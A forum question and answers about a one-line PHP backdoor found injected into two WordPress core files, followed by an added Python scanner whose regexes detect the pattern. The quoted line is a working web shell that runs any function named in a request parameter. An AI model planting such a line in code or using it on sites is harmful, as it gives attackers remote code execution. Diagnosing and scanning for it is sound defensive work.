
Any help is very appreciated.

Short story:

I would like some help trying to understand what this line of code is intended to do.

extract($_REQUEST)&&@$shall(stripslashes($shall))&&exit;

I deciphered most of it except the $shall part. $shall does not appear anywhere else and I did not go into details of reading WordPress code.

The line appeared in the below files as the first line right after <?php

Long story:

I have a site that runs on WordPress and it randomly broke with errors in 2 WordPress files. The filenames are

…/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php

…/wp-includes/blocks/block.php

It is not present in WordPress GitLab file versions. We did not initiate any WordPress updates, etc. I commented out the line in both files and all is back to normal.

Any ideas as to how/why/for what purpose this line would appear there?

2 Answers


  1. If ($_REQUEST['shall']="something") then $shall will equal the string 'something' after the extract part. If there’s a function called something, it will execute. So basically all WordPress functions are available for this script. This is a back door for malware, no doubt. Not good.

    A Google search found a record of the file name somewhere; however, before you remove it, be ready for it to reappear if you haven’t fixed your vulnerabilities.

  2. This is malware; remove the code part from the file. Then it works for me.

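A defensive check for the pattern discussed in the answers, as an added example that is not part of the original thread: a Python scanner that flags PHP lines calling extract() on a request superglobal and rates them "high" when the same line then calls a function through a variable. It generalizes from $_REQUEST to $_GET, $_POST and $_COOKIE; the function names, severity labels and sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# extract() fed straight from a request superglobal: the client chooses local variable names.
EXTRACT_RE = re.compile(r"\bextract\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.IGNORECASE)
# A call through a variable, e.g. $shall(...): the function name is data, not code.
VARCALL_RE = re.compile(r"\$[A-Za-z_]\w*\s*\(")


def scan_php_source(text):
    """Return a list of (line_number, severity, line) for suspicious lines."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = EXTRACT_RE.search(line)
        if not match:
            continue
        # Only a variable call that follows the extract() on the same line counts as "high".
        tail = line[match.end():]
        severity = "high" if VARCALL_RE.search(tail) else "review"
        findings.append((number, severity, line.strip()))
    return findings


def scan_tree(root):
    """Scan every *.php file under root; return {relative_path: findings}."""
    results = {}
    for path in sorted(Path(root).rglob("*.php")):
        # Injected files may contain arbitrary bytes, so never fail on decoding.
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = scan_php_source(text)
        if hits:
            results[path.relative_to(root).as_posix()] = hits
    return results


# Constructed samples: the line quoted in the question, and a harmless file.
INFECTED = "<?php\nextract($_REQUEST)&&@$shall(stripslashes($shall))&&exit;\n/** REST API: ... */\n"
CLEAN = "<?php\nfunction render_block_core_block( $attributes ) {\n\treturn '';\n}\n"

if __name__ == "__main__":
    import sys
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for number, severity, line in hits:
            print(f"{severity}\t{name}:{number}\t{line}")
```

Run it with the WordPress root as the argument and compare every hit against a clean copy of the same WordPress version.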